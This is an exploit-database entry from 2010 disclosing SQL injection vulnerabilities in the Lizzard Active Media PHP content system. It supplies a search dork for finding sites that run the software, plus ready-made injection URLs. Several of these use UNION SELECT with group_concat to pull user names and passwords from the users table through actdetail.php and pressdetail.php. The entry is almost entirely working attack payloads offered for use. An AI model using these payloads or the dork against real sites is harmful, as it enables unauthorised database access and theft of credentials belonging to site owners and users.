Lizzard Active Media Multiple SQL Injection Vulnerabilities

2010-05-25T00:00:00
ID 1337DAY-ID-12392
Type zdt
Reporter CoBRa_21
Modified 2010-05-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================
Lizzard Active Media Multiple SQL Injection Vulnerabilities
===========================================================


Lizzard Active Media Multiple SQL Injection Vulnerabilities:
newsdetail.php
progvisitors.php
actdetail.php
  
-------------------------------------------------------------------------------------------
  
Author: CoBRa_21
  
Script Home: http://www.lizzard.gr/
 
Dork: powered by Lizzard Active Media
 
-------------------------------------------------------------------------------------------
  
Sql Injection:
  
http://localhost/[path]/progvisitors.php?ptype=1/**/and/**/1=2
 
http://localhost/[path]/progvisitors.php?ptype=1/**/and/**/1=1
 
http://localhost/[path]/pressdetail.php?lang=&prs_id=61/**/union/**/select/**/0,1,2,group_concat(name,0x3a,password),4,5,6,7/**/from/**/users
 
http://localhost/[path]/actdetail.php?prg_id=-21/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(name,0x3a,password),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/**/from/**/users



#  0day.today [2018-02-20]  #